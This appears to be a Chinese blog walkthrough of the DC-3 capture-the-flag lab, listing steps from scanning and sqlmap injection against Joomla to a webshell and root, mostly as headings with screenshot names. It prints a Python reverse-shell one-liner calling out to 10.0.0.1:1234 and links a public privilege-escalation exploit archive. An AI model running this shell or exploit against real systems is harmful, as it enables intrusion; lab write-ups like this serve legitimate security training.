DC-3

DC-3

探测IP

image-20210307215658195

扫描主机

image-20210307215752142

访问80

image-20210307215816107

只有一个flag

扫描目录

image-20210307215940926

whatweb查看

image-20210307220119756

访问后台

image-20210307215950190

image-20210307220019745

搜索joomla漏洞

image-20210307220203680

image-20210307220238432

查看

image-20210307220335576

利用sqlmap

image-20210307220534215

库名

image-20210307220608431

表名

image-20210307220728825

字段名

image-20210307222701996

数据

image-20210307222823472

破解admin密码

image-20210307225142029

登陆后台

image-20210307231341983

写入shell

image-20210309224113917

冰蝎连接

image-20210309224136412

命令行反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20210309224258240

编译可执行文件

image-20210309224326132

获取root

image-20210309224401906

涉及到的POC包:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

posted @ 2021-03-09 22:48  木捏牛  阅读(105)  评论(0编辑  收藏  举报